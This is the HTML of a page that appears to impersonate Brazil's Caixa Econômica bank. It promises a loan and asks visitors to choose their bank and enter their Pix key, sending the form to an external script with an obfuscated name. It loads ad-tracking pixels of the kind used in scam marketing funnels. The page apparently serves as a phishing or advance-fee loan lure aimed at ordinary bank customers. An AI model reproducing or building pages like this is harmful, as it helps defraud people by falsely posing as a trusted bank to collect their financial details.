﻿<!DOCTYPE html><html><head>
<script>
  window.pixelId = "67f41a1b2e2b5203c9648cd6";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>

<script
  src="https://cdn.utmify.com.br/scripts/utms/latest.js"
  async
  defer
></script>
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-TGV5XJVC');</script>
<!-- End Google Tag Manager -->
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <title>Caixa Econômica - Dados Bancários</title>
    
      

<script src="../scripts/utms/latest-7.js" data-utmify-prevent-subids="" async="" defer=""></script>


   
    <link rel="stylesheet" href="css/mV3zvLmCXh5a.css">
</head>

<body>
    <div class="container">
        <div class="header" style="background-color: white; padding: 18px; display: flex; justify-content: center;">
            <img src="images/logo.png" alt="" style="width: 100%; max-width: 180px;">
        </div>

        <div class="content">
            <h1>Informe seus dados bancários</h1>

            <p class="subtitle">Selecione seu banco e informe sua Chave Pix para receber o empréstimo</p>

            <form id="pixForm">
                <div class="form-group">
                    <label for="bank">Banco</label>

                    <div class="search-container">
                        <input type="text" id="bankSearch" placeholder="Digite o nome do seu banco" autocomplete="off">

                        <div id="bankList" class="bank-list"></div>
                    </div>
                </div>

                <div class="form-group">
                    <label for="pixKey">Chave Pix</label>
                    
                    <input type="text" id="pixKey" placeholder="CPF, telefone, e-mail ou chave aleatória">
                </div>

                <button type="submit" class="continue-btn">Continuar</button>
            </form>
        </div>
    </div>

    <script src="js/dKdci19BSvRr.js"></script>



</body><!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-TGV5XJVC"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) --></html>